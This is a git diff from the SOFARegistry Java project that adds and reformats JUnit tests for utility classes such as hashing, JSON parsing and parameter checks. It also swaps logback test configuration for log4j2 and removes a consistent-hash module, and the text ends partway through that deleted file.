a/server/common/util/src/test/java/com/alipay/sofa/registry/util/JsonUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/JsonUtilsTest.java new file mode 100644 index 000000000..d8dfc1c16 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/JsonUtilsTest.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.alipay.sofa.registry.TestUtils; +import com.fasterxml.jackson.core.type.TypeReference; +import com.google.common.collect.Maps; +import java.util.HashMap; +import org.junit.Assert; +import org.junit.Test; + +public class JsonUtilsTest { + + @Test + public void testIllegal() { + TestUtils.assertException(RuntimeException.class, () -> JsonUtils.read("", HashMap.class)); + TestUtils.assertException( + RuntimeException.class, () -> JsonUtils.read("", new TypeReference() {})); + } + + @Test + public void test() { + HashMap m = Maps.newHashMap(); + m.put("x", "y"); + String v = JsonUtils.writeValueAsString(m); + HashMap m1 = JsonUtils.read(v, HashMap.class); + HashMap m2 = JsonUtils.read(v, new TypeReference() {}); + + Assert.assertEquals(m, m1); + Assert.assertEquals(m, m2); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/MathUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/MathUtilsTest.java new file mode 100644 index 000000000..d5595c380 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/MathUtilsTest.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import static org.junit.Assert.*; + +import org.junit.Assert; +import org.junit.Test; + +public class MathUtilsTest { + + @Test + public void testDivideCeil() { + Assert.assertEquals(3, MathUtils.divideCeil(5, 2)); + Assert.assertEquals(3, MathUtils.divideCeil(6, 2)); + Assert.assertEquals(4, MathUtils.divideCeil(7, 2)); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/MessageDigestsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/MessageDigestsTest.java new file mode 100644 index 000000000..a70304c6e --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/MessageDigestsTest.java @@ -0,0 +1,111 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import static org.junit.Assert.assertEquals; + +import java.security.MessageDigest; +import org.junit.Test; + +/** + * The type Message digests test. + * + * @author zhuoyu.sjw + * @version $Id : MessageDigestsTest.java, v 0.1 2018-03-07 11:19 zhuoyu.sjw Exp $$ + */ +public class MessageDigestsTest { + + /** Md 5. */ + @Test + public void md5() { + assertHash("d41d8cd98f00b204e9800998ecf8427e", "", MessageDigests.md5()); + assertHash("900150983cd24fb0d6963f7d28e17f72", "abc", MessageDigests.md5()); + assertHash( + "8215ef0796a20bcaaae116d3876c664a", + "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", + MessageDigests.md5()); + assertHash( + "7707d6ae4e027c70eea2a935c2296f21", + new String(new char[1000000]).replace("\0", "a"), + MessageDigests.md5()); + assertHash( + "9e107d9d372bb6826bd81d3542a419d6", + "The quick brown fox jumps over the lazy dog", + MessageDigests.md5()); + assertHash( + "1055d3e698d289f2af8663725127bd4b", + "The quick brown fox jumps over the lazy cog", + MessageDigests.md5()); + } + + /** Sha 1. */ + @Test + public void sha1() { + assertHash("da39a3ee5e6b4b0d3255bfef95601890afd80709", "", MessageDigests.sha1()); + assertHash("a9993e364706816aba3e25717850c26c9cd0d89d", "abc", MessageDigests.sha1()); + assertHash( + "84983e441c3bd26ebaae4aa1f95129e5e54670f1", + "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", + MessageDigests.sha1()); + assertHash( + "34aa973cd4c4daa4f61eeb2bdbad27316534016f", + new String(new char[1000000]).replace("\0", "a"), + MessageDigests.sha1()); + assertHash( + "2fd4e1c67a2d28fced849ee1bb76e7391b93eb12", + "The quick brown fox jumps over the lazy dog", + MessageDigests.sha1()); + assertHash( + "de9f2c7fd25e1b3afad3e85a0bd17d9b100db4b3", + "The quick brown fox jumps over the lazy cog", + MessageDigests.sha1()); + } + + /** Sha 256. */ + @Test + public void sha256() { + assertHash( + "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "", + MessageDigests.sha256()); + assertHash( + "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad", + "abc", + MessageDigests.sha256()); + assertHash( + "248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1", + "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", + MessageDigests.sha256()); + assertHash( + "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0", + new String(new char[1000000]).replace("\0", "a"), + MessageDigests.sha256()); + assertHash( + "d7a8fbb307d7809469ca9abcb0082e4f8d5651e46d3cdb762d02d0bf37c9e592", + "The quick brown fox jumps over the lazy dog", + MessageDigests.sha256()); + assertHash( + "e4c4d8f3bf76b692de791a173e05321150f7a345b46484fe427f6acc7ecc81be", + "The quick brown fox jumps over the lazy cog", + MessageDigests.sha256()); + } + + private void assertHash(String expected, String test, MessageDigest messageDigest) { + String actual = MessageDigests.toHexString(messageDigest.digest(test.getBytes())); + assertEquals(expected, actual); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/OsUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/OsUtilsTest.java new file mode 100644 index 000000000..fe98996d9 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/OsUtilsTest.java @@ -0,0 +1,33 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import static org.junit.Assert.*; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import org.junit.Test; + +public class OsUtilsTest { + + private Logger logger = LoggerFactory.getLogger(OsUtilsTest.class); + + @Test + public void getCpuCount() { + logger.info("cpu cores: {}", OsUtils.getCpuCount()); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/ParaCheckUtilTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/ParaCheckUtilTest.java index 930ee7e79..c3b8de71a 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/util/ParaCheckUtilTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/ParaCheckUtilTest.java @@ -16,52 +16,100 @@ */ package com.alipay.sofa.registry.util; -import org.junit.Assert; -import org.junit.Test; +import static junit.framework.TestCase.fail; +import com.google.common.collect.Sets; import java.util.ArrayList; import java.util.Arrays; - -import static junit.framework.TestCase.fail; +import org.junit.Assert; +import org.junit.Test; /** * @author xuanbei * @since 2018/12/28 */ public class ParaCheckUtilTest { - @Test - public void testCheckNotNull() { - ParaCheckUtil.checkNotNull("zhangsan", "name"); - try { - ParaCheckUtil.checkNotNull(null, "name"); - fail("cannot access here."); - } catch (Exception e) { - Assert.assertTrue(e instanceof RuntimeException); - Assert.assertEquals("name is not allowed to be null", e.getMessage()); - } + @Test + public void testCheckNotNull() { + ParaCheckUtil.checkNotNull("zhangsan", "name"); + try { + ParaCheckUtil.checkNotNull(null, "name"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); + Assert.assertEquals("name is not allowed to be null", e.getMessage()); + } + } + + @Test + public void testCheckNotBlank() { + ParaCheckUtil.checkNotBlank("zhangsan", "name"); + try { + ParaCheckUtil.checkNotBlank("", "name"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); + Assert.assertEquals("name is not allowed to be blank", e.getMessage()); + } + } + + @Test + public void testCheckNotEmpty() { + ParaCheckUtil.checkNotEmpty(Arrays.asList("zhangsan", "lisi"), "names"); + try { + ParaCheckUtil.checkNotEmpty(new ArrayList<>(), "names"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); + Assert.assertEquals("names is not allowed to be empty", e.getMessage()); + } + + try { + ParaCheckUtil.checkNotEmpty(null, "names"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); + Assert.assertEquals("names is not allowed to be empty", e.getMessage()); + } + } + + @Test + public void testCheckEquals() { + ParaCheckUtil.checkEquals(1, 1, "names"); + try { + ParaCheckUtil.checkEquals(null, 1, "names"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); + } + } + + @Test + public void testCheckIsPositive() { + ParaCheckUtil.checkIsPositive(1, "names"); + try { + ParaCheckUtil.checkIsPositive(0, "names"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); } - @Test - public void testCheckNotBlank() { - ParaCheckUtil.checkNotBlank("zhangsan", "name"); - try { - ParaCheckUtil.checkNotBlank("", "name"); - fail("cannot access here."); - } catch (Exception e) { - Assert.assertTrue(e instanceof RuntimeException); - Assert.assertEquals("name is not allowed to be blank", e.getMessage()); - } + try { + ParaCheckUtil.checkIsPositive(-1, "names"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); } + } - @Test - public void testCheckNotEmpty() { - ParaCheckUtil.checkNotEmpty(Arrays.asList("zhangsan", "lisi"), "names"); - try { - ParaCheckUtil.checkNotEmpty(new ArrayList<>(), "names"); - fail("cannot access here."); - } catch (Exception e) { - Assert.assertTrue(e instanceof RuntimeException); - Assert.assertEquals("names is not allowed to be empty", e.getMessage()); - } + @Test + public void testCheckContains() { + ParaCheckUtil.checkContains(Sets.newHashSet(1, 2), 1, "names"); + try { + ParaCheckUtil.checkContains(Sets.newHashSet(1, 2), 3, "names"); + fail("cannot access here."); + } catch (Exception e) { + Assert.assertTrue(e instanceof RuntimeException); } + } } diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/PropertySplitterTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/PropertySplitterTest.java index 93c1d70f5..6a8b6f107 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/util/PropertySplitterTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/PropertySplitterTest.java @@ -16,63 +16,74 @@ */ package com.alipay.sofa.registry.util; +import java.util.List; import org.junit.Assert; import org.junit.Test; -import java.util.List; - /** * @author xuanbei * @since 2018/12/28 */ public class PropertySplitterTest { - private PropertySplitter propertySplitter = new PropertySplitter(); + private PropertySplitter propertySplitter = new PropertySplitter(); - @Test - public void testMap() { - Assert.assertEquals(0, propertySplitter.map(null).size()); - Assert.assertEquals(0, propertySplitter.map("").size()); - Assert.assertEquals(2, propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").size()); - Assert.assertEquals("VALUE1", propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY1")); - Assert.assertEquals("VALUE2", propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY2")); - } + @Test + public void testMap() { + Assert.assertEquals(0, propertySplitter.map(null).size()); + Assert.assertEquals(0, propertySplitter.map("").size()); + Assert.assertEquals(2, propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").size()); + Assert.assertEquals("VALUE1", propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY1")); + Assert.assertEquals("VALUE2", propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY2")); + } - @Test - public void testMapOfList() { - Assert.assertEquals(0, propertySplitter.mapOfList(null).size()); - Assert.assertEquals(0, propertySplitter.mapOfList("|").size()); - Assert.assertEquals(2, - propertySplitter.mapOfList("KEY1:VALUE1.1,VALUE1.2|KEY2:VALUE2.1,VALUE2.2").size()); - Assert.assertTrue(propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY1") - .contains("VALUE1")); - Assert.assertTrue(propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY2") - .contains("VALUE2")); - } + @Test + public void testMapOfList() { + Assert.assertEquals(0, propertySplitter.mapOfList(null).size()); + Assert.assertEquals(0, propertySplitter.mapOfList("|").size()); + Assert.assertEquals( + 2, propertySplitter.mapOfList("KEY1:VALUE1.1,VALUE1.2|KEY2:VALUE2.1,VALUE2.2").size()); + Assert.assertTrue( + propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY1").contains("VALUE1")); + Assert.assertTrue( + propertySplitter.map("KEY1:VALUE1,KEY2:VALUE2").get("KEY2").contains("VALUE2")); + } - @Test - public void testList() { - Assert.assertEquals(0, propertySplitter.list(null).size()); - Assert.assertEquals(0, propertySplitter.list("").size()); - Assert.assertEquals(4, propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").size()); - Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE1")); - Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE2")); - Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE3")); - Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE4")); - } + @Test + public void testList() { + Assert.assertEquals(0, propertySplitter.list(null).size()); + Assert.assertEquals(0, propertySplitter.list("").size()); + Assert.assertEquals(4, propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").size()); + Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE1")); + Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE2")); + Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE3")); + Assert.assertTrue(propertySplitter.list("VALUE1,VALUE2,VALUE3,VALUE4").contains("VALUE4")); + } - @Test - public void testGroupedList() { - Assert.assertEquals(0, propertySplitter.groupedList(null).size()); - Assert.assertEquals(0, propertySplitter.groupedList("").size()); - Assert.assertEquals(2, propertySplitter.groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2") - .size()); - Assert.assertTrue(((List) (((List) propertySplitter - .groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")).get(0))).contains("VALUE1.1")); - Assert.assertTrue(((List) (((List) propertySplitter - .groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")).get(0))).contains("VALUE1.1")); - Assert.assertTrue(((List) (((List) propertySplitter - .groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")).get(1))).contains("VALUE2.1")); - Assert.assertTrue(((List) (((List) propertySplitter - .groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")).get(1))).contains("VALUE2.2")); - } + @Test + public void testGroupedList() { + Assert.assertEquals(0, propertySplitter.groupedList(null).size()); + Assert.assertEquals(0, propertySplitter.groupedList("").size()); + Assert.assertEquals( + 2, propertySplitter.groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2").size()); + Assert.assertTrue( + ((List) + (((List) propertySplitter.groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")) + .get(0))) + .contains("VALUE1.1")); + Assert.assertTrue( + ((List) + (((List) propertySplitter.groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")) + .get(0))) + .contains("VALUE1.1")); + Assert.assertTrue( + ((List) + (((List) propertySplitter.groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")) + .get(1))) + .contains("VALUE2.1")); + Assert.assertTrue( + ((List) + (((List) propertySplitter.groupedList("VALUE1.1,VALUE1.2|VALUE2.1,VALUE2.2")) + .get(1))) + .contains("VALUE2.2")); + } } diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/RevisionUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/RevisionUtilsTest.java new file mode 100644 index 000000000..f04cc03d4 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/RevisionUtilsTest.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.google.common.collect.Lists; +import java.nio.charset.StandardCharsets; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class RevisionUtilsTest { + @Test + public void test() { + List list = Lists.newArrayList("xx1", "yy2"); + String digest1 = RevisionUtils.revisionsDigest(list); + String digest2 = + MessageDigests.toHexString( + MessageDigests.md5().digest("xx1yy2".getBytes(StandardCharsets.UTF_8))); + Assert.assertEquals(digest1, digest2); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/SingleFlightTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/SingleFlightTest.java new file mode 100644 index 000000000..9d4bcce3d --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/SingleFlightTest.java @@ -0,0 +1,62 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.util.concurrent.Callable; +import java.util.concurrent.ExecutorService; +import java.util.concurrent.Executors; +import org.junit.Assert; +import org.junit.Test; + +public class SingleFlightTest { + @Test + public void test() throws Exception { + final SingleFlight single = new SingleFlight(); + MockFlight f1 = new MockFlight(); + MockFlight f2 = new MockFlight(); + ExecutorService executors = Executors.newFixedThreadPool(2); + executors.submit(() -> single.execute("test", f1)); + Thread.sleep(50); + executors.submit(() -> single.execute("test", f2)); + Thread.sleep(50); + Assert.assertFalse(f1.run); + Assert.assertFalse(f2.run); + + f2.sleep = false; + Thread.sleep(50); + f1.sleep = false; + + Thread.sleep(50); + Assert.assertTrue(f1.run); + Assert.assertFalse(f2.run); + executors.shutdown(); + } + + private final class MockFlight implements Callable { + volatile boolean sleep = true; + volatile boolean run; + + @Override + public Object call() throws Exception { + while (sleep) { + Thread.sleep(10); + } + run = true; + return null; + } + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/TimestampUtilTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/TimestampUtilTest.java new file mode 100644 index 000000000..98efa6b27 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/TimestampUtilTest.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.sql.Timestamp; +import org.junit.Assert; +import org.junit.Test; + +public class TimestampUtilTest { + @Test + public void test() { + long now = System.currentTimeMillis(); + Timestamp ts = new Timestamp(now); + Assert.assertEquals(String.valueOf(now), TimestampUtil.getNanosLong(ts), now * 1000000); + } + + @Test + public void testNanos() { + long now = System.currentTimeMillis(); + long nanos = now / 1000 * 1000000000; + Timestamp ts = new Timestamp(now); + for (int i = 0; i <= 999999999; i++) { + ts.setNanos(i); + Assert.assertEquals(TimestampUtil.getNanosLong(ts), nanos + i); + } + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/VersionsMapUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/VersionsMapUtilsTest.java index 93d577781..86ca640ca 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/util/VersionsMapUtilsTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/VersionsMapUtilsTest.java @@ -16,25 +16,23 @@ */ package com.alipay.sofa.registry.util; -import org.junit.Assert; -import org.junit.Test; - import java.util.HashMap; import java.util.Map; +import org.junit.Assert; +import org.junit.Test; /** * @author xuanbei * @since 2019/3/27 */ public class VersionsMapUtilsTest { - @Test - public void doTest() { - Map versionsMap = new HashMap<>(); - Assert.assertTrue(VersionsMapUtils.checkAndUpdateVersions(versionsMap, "mockDataInfoId", - 20L)); - Assert.assertTrue(new VersionsMapUtils().checkAndUpdateVersions(versionsMap, - "mockDataInfoId", 30L)); - Assert.assertFalse(new VersionsMapUtils().checkAndUpdateVersions(versionsMap, - "mockDataInfoId", 10L)); - } + @Test + public void doTest() { + Map versionsMap = new HashMap<>(); + Assert.assertTrue(VersionsMapUtils.checkAndUpdateVersions(versionsMap, "mockDataInfoId", 20L)); + Assert.assertTrue( + new VersionsMapUtils().checkAndUpdateVersions(versionsMap, "mockDataInfoId", 30L)); + Assert.assertFalse( + new VersionsMapUtils().checkAndUpdateVersions(versionsMap, "mockDataInfoId", 10L)); + } } diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/WakeUpLoopRunnableTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/WakeUpLoopRunnableTest.java new file mode 100644 index 000000000..cb2fe84d4 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/WakeUpLoopRunnableTest.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.util.concurrent.atomic.AtomicInteger; +import org.junit.Assert; +import org.junit.Test; + +public class WakeUpLoopRunnableTest { + @Test + public void test() throws Exception { + MockLoop loop = new MockLoop(); + loop.suspend(); + Thread t = ConcurrentUtils.createDaemonThread("loop-test", loop); + t.start(); + loop.wakeup(); + Thread.sleep(100); + Assert.assertEquals(0, loop.count.get()); + Assert.assertTrue(loop.isSuspended()); + loop.resume(); + loop.wakeup(); + Assert.assertFalse(loop.isSuspended()); + Thread.sleep(100); + int loopCount = loop.count.get(); + Assert.assertTrue("loopCount:" + loopCount, loopCount != 0); + + loop.runException = true; + loop.wakeup(); + Thread.sleep(100); + Assert.assertTrue(t.isAlive()); + + loop.close(); + Assert.assertTrue(loop.isClosed()); + Thread.sleep(100); + + Assert.assertFalse(t.isAlive()); + } + + private static final class MockLoop extends WakeUpLoopRunnable { + final AtomicInteger count = new AtomicInteger(); + boolean runException; + + @Override + public void runUnthrowable() { + count.incrementAndGet(); + if (runException) { + throw new RuntimeException(); + } + } + + @Override + public int getWaitingMillis() { + return 10; + } + } +} diff --git a/server/common/util/src/test/resources/log4j2.xml b/server/common/util/src/test/resources/log4j2.xml new file mode 100644 index 000000000..babcff687 --- /dev/null +++ b/server/common/util/src/test/resources/log4j2.xml @@ -0,0 +1,220 @@ + + + + + ${user.home}/logs/registry/meta + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/server/common/util/src/test/resources/logback-test.xml b/server/common/util/src/test/resources/logback-test.xml deleted file mode 100644 index 6c3ccdf3e..000000000 --- a/server/common/util/src/test/resources/logback-test.xml +++ /dev/null @@ -1,31 +0,0 @@ - - - - - - - - %m%n - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/server/consistency/pom.xml b/server/consistency/pom.xml deleted file mode 100644 index 7e8855042..000000000 --- a/server/consistency/pom.xml +++ /dev/null @@ -1,38 +0,0 @@ - - - - com.alipay.sofa - registry-server-parent - 5.2.0-SNAPSHOT - ../pom.xml - - 4.0.0 - - registry-consistency - - - ../../ - - - - - junit - junit - test - - - org.slf4j - slf4j-api - test - - - ch.qos.logback - logback-classic - test - - - - - diff --git a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/ConsistentHash.java b/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/ConsistentHash.java deleted file mode 100644 index 3c6949236..000000000 --- a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/ConsistentHash.java +++ /dev/null @@ -1,151 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.Collections; -import java.util.HashSet; -import java.util.List; -import java.util.Set; -import java.util.SortedMap; -import java.util.TreeMap; - -/** - * Consistent hash implementation, use {@link HashNode} as physical node. - * @param hash node - * @author zhuoyu.sjw - * @version $Id : ConsistentHash.java, v 0.1 2016-08-24 11:10 zhuoyu.sjw Exp $$ - */ -public class ConsistentHash { - - /** character used to separate virtual nodes */ - private static final char SIGN = '#'; - - /** number of virtual nodes for one real node */ - private final int numberOfReplicas; - - /** real nodes */ - private Set realNodes; - - /** hash function */ - private final HashFunction hashFunction; - - /** */ - private final SortedMap circle = new TreeMap<>(); - - /** - * Instantiates a new Consistent hash. - * - * @param numberOfReplicas the number of replicas - * @param nodes the nodes - */ - public ConsistentHash(int numberOfReplicas, Collection nodes) { - this(new MD5HashFunction(), numberOfReplicas, nodes); - } - - /** - * Instantiates a new Consistent hash. - * - * @param hashFunction the hash function - * @param numberOfReplicas the number of replicas - * @param nodes the nodes - */ - public ConsistentHash(HashFunction hashFunction, int numberOfReplicas, Collection nodes) { - this.realNodes = new HashSet<>(); - this.hashFunction = hashFunction; - this.numberOfReplicas = numberOfReplicas; - for (T node : nodes) { - addNode(node); - } - } - - /** - * Add a new node to the consistent hash - * - * This is not thread safe. - * @param node the node - */ - private void addNode(T node) { - realNodes.add(node); - for (int i = 0; i < numberOfReplicas; i++) { - // The string addition forces each replica to have different hash - 